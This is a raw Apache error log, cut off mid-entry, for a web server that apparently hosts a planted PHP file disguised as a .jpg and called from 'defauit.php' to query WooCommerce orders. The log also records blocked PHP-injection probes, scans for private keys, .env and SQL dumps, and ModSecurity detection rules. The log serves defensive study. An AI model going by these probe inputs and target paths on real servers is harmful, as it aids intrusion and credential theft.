207.154.240.68:46636] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 16:49:36.233665 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] Stack trace:, referer: https://www.google.com [Sat Sep 20 16:49:36.233712 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 16:49:36.233722 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] #1 {main}, referer: https://www.google.com [Sat Sep 20 16:49:36.233770 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Mon Sep 22 13:59:47.430246 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Mon Sep 22 13:59:47.430452 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 13:59:47.430574 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 13:59:47.430663 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Mon Sep 22 13:59:47.430675 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] Stack trace:, referer: https://www.google.com [Mon Sep 22 13:59:47.430719 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Mon Sep 22 13:59:47.430729 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] #1 {main}, referer: https://www.google.com [Mon Sep 22 13:59:47.430777 2025] [:error] [pid 5828:tid 5844] [client 207.154.240.68:53314] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Sep 24 09:46:52.360307 2025] [:error] [pid 23905:tid 23921] [client 61.222.202.149:40815] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 12:33:31.358392 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 12:33:31.358632 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Warning: require_once(/home/id/cms.dev-unit.com/config/config.inc.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 12:33:31.358764 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] PHP Fatal error: Uncaught Error: Failed opening required '/home/id/cms.dev-unit.com/config/config.inc.php' (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg:3, referer: https://www.google.com [Thu Sep 25 12:33:31.358776 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] Stack trace:, referer: https://www.google.com [Thu Sep 25 12:33:31.358822 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Sep 25 12:33:31.358832 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] #1 {main}, referer: https://www.google.com [Thu Sep 25 12:33:31.358880 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:35862] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 14:59:55.343838 2025] [:error] [pid 16577:tid 16591] [client 207.154.240.68:60432] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 10:40:24.731103 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 10:40:24.731291 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 10:40:24.731420 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 10:40:24.731509 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Sun Sep 28 10:40:24.731520 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] Stack trace:, referer: https://www.google.com [Sun Sep 28 10:40:24.731565 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sun Sep 28 10:40:24.731574 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] #1 {main}, referer: https://www.google.com [Sun Sep 28 10:40:24.731621 2025] [:error] [pid 28447:tid 28496] [client 207.154.240.68:40644] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 30 14:28:56.321381 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Sep 30 14:28:56.321586 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 14:28:56.321707 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 14:28:56.321797 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Tue Sep 30 14:28:56.321812 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] Stack trace:, referer: https://www.google.com [Tue Sep 30 14:28:56.321858 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Tue Sep 30 14:28:56.321868 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] #1 {main}, referer: https://www.google.com [Tue Sep 30 14:28:56.321915 2025] [:error] [pid 1076:tid 1088] [client 207.154.240.68:48694] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Oct 01 00:55:03.485696 2025] [:error] [pid 870:tid 908] [client 188.166.108.93:57668] [client 188.166.108.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNxRtz7zzybNgcMlJroMTQAAAAg"] [Wed Oct 01 00:55:03.829685 2025] [:error] [pid 870:tid 924] [client 142.93.143.8:46712] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aNxRtz7zzybNgcMlJroMTwAAABg"] [Wed Oct 01 00:55:06.128498 2025] [authz_core:error] [pid 872:tid 948] [client 142.93.143.8:46806] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 00:55:06.337750 2025] [authz_core:error] [pid 1076:tid 1083] [client 188.166.108.93:57728] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 11:35:36.654167 2025] [:error] [pid 14303:tid 14374] [client 109.202.99.41:23207] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aNzn2F-FXvdDMTsmh3US3gAAAE8"] [Wed Oct 01 11:35:36.665934 2025] [:error] [pid 14307:tid 14369] [client 109.202.99.41:58373] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/server.key"] [unique_id "aNzn2Gy9CFH0W1YmlGI6cgAAAIE"] [Wed Oct 01 11:35:36.721029 2025] [:error] [pid 14547:tid 14567] [client 109.202.99.41:24817] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aNzn2Pjp_2kv0GgoTdZYhAAAANI"] [Wed Oct 01 11:35:36.727304 2025] [:error] [pid 14547:tid 14568] [client 109.202.99.41:13077] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aNzn2Pjp_2kv0GgoTdZYhgAAANM"] [Wed Oct 01 11:35:36.740792 2025] [:error] [pid 14303:tid 14378] [client 109.202.99.41:39617] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aNzn2F-FXvdDMTsmh3US3wAAAFE"] [Wed Oct 01 11:35:36.758409 2025] [:error] [pid 14547:tid 14549] [client 109.202.99.41:39877] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aNzn2Pjp_2kv0GgoTdZYjAAAAMA"] [Wed Oct 01 11:35:36.820460 2025] [:error] [pid 14307:tid 14387] [client 109.202.99.41:52029] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/etc/ssl/private/server.key"] [unique_id "aNzn2Gy9CFH0W1YmlGI6egAAAIo"] [Wed Oct 01 11:35:36.823851 2025] [:error] [pid 14297:tid 14330] [client 109.202.99.41:45793] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aNzn2GVWilLYI35-oolTMAAAAAM"] [Wed Oct 01 11:35:36.829169 2025] [authz_host:error] [pid 14307:tid 14373] [client 109.202.99.41:2935] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Oct 01 11:35:36.829212 2025] [authz_core:error] [pid 14307:tid 14373] [client 109.202.99.41:2935] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Oct 01 11:35:36.868370 2025] [:error] [pid 14307:tid 14402] [client 109.202.99.41:31729] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aNzn2Gy9CFH0W1YmlGI6fQAAAJU"] [Wed Oct 01 13:28:06.625123 2025] [access_compat:error] [pid 14547:tid 14561] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env, referer: https://www.google.com/ [Wed Oct 01 13:28:06.780531 2025] [access_compat:error] [pid 14547:tid 14573] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env, referer: https://www.google.com/ [Wed Oct 01 13:28:06.935101 2025] [access_compat:error] [pid 14547:tid 14565] [client 54.169.226.40:35698] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase, referer: https://www.google.com/ [Wed Oct 01 17:03:39.414350 2025] [:error] [pid 14547:tid 14559] [client 207.154.240.68:49790] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Oct 01 20:56:28.283301 2025] [access_compat:error] [pid 14547:tid 14571] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env, referer: https://www.google.com/ [Wed Oct 01 20:56:28.295671 2025] [access_compat:error] [pid 14547:tid 14570] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env, referer: https://www.google.com/ [Wed Oct 01 20:56:28.310183 2025] [access_compat:error] [pid 14547:tid 14557] [client 18.132.250.164:55690] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase, referer: https://www.google.com/ [Sat Oct 04 12:27:06.677919 2025] [:error] [pid 2353:tid 2473] [client 13.79.87.25:3598] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sat Oct 04 12:27:09.777981 2025] [:error] [pid 2547:tid 2556] [client 13.79.87.25:7803] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Oct 05 17:53:34.698530 2025] [:error] [pid 13211:tid 13232] [client 172.192.74.60:54013] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 09 14:25:54.042104 2025] [:error] [pid 4321:tid 4368] [client 207.154.240.68:51566] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 15:16:10.998191 2025] [:error] [pid 4321:tid 4356] [client 207.154.240.68:56010] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 20:35:28.680208 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Oct 09 20:35:28.680455 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: include(wp-config.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 20:35:28.680559 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Warning: include(): Failed opening 'wp-config.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 5, referer: https://www.google.com [Thu Oct 09 20:35:28.680635 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] PHP Fatal error: Uncaught Error: Undefined constant "ABSPATH" in /home/id/cms.dev-unit.com/nbpafebaef.jpg:8, referer: https://www.google.com [Thu Oct 09 20:35:28.680647 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] Stack trace:, referer: https://www.google.com [Thu Oct 09 20:35:28.680690 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Oct 09 20:35:28.680700 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] #1 {main}, referer: https://www.google.com [Thu Oct 09 20:35:28.680749 2025] [:error] [pid 21259:tid 21269] [client 207.154.240.68:54770] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 8, referer: https://www.google.com [Wed Oct 15 00:08:20.159480 2025] [:error] [pid 12775:tid 12792] [client 172.190.142.176:28855] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Wed Oct 15 00:08:26.719803 2025] [:error] [pid 21080:tid 21084] [client 172.190.142.176:28110] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Oct 15 00:08:38.112984 2025] [:error] [pid 12775:tid 12779] [client 172.190.142.176:38496] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Wed Oct 15 00:22:31.804157 2025] [:error] [pid 10194:tid 10220] [client 20.242.104.10:1138] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Oct 22 09:18:42.602576 2025] [:error] [pid 7574:tid 7642] [client 172.190.142.176:56094] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 23 01:34:13.579746 2025] [:error] [pid 21478:tid 21510] [client 48.210.8.193:5152] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Oct 26 17:59:16.373225 2025] [:error] [pid 28886:tid 28893] [client 13.79.168.144:4220] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Wed Oct 29 06:46:23.897127 2025] [:error] [pid 25267:tid 25291] [client 52.169.148.186:1482] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Wed Oct 29 06:46:24.378020 2025] [:error] [pid 25069:tid 25151] [client 52.169.148.186:1783] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Nov 04 00:38:06.442904 2025] [core:error] [pid 8067:tid 8078] [client 172.190.142.176:31133] Script timed out before returning headers: index.php [Fri Nov 07 13:56:26.409663 2025] [:error] [pid 31683:tid 31708] [client 172.190.142.176:32581] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/404.php [Mon Nov 10 18:17:04.164987 2025] [:error] [pid 7619:tid 7661] [client 209.38.71.77:56984] [client 209.38.71.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:_zendesk_session. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:_zendesk_session: XVwCw5DXj+ByX4jdq86g9euEPqv9tFdffFK1aPDuSdYHKqoqB8eyf3F+7us6mDOg6BaGRAVBO3sFZbH+anZMNuzkOAnSEHpvqpz0lM7j5178JDF8dyGn9a190pNYDSqYZUpaENU4qhmwjT7mnQq8XMbTn8fcVgKlmpCdsL0tv7zxxXXRFMNueqpWewGFRUX6S4+Ak8u2vE/+NQuigLOHavRNfK93EtKfWj95tr6mR1i0aCJtYhCKrw==--zrrqEQJuMg3Phvie--N+BNrSi5O5KQBw/14e19rA=="] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag 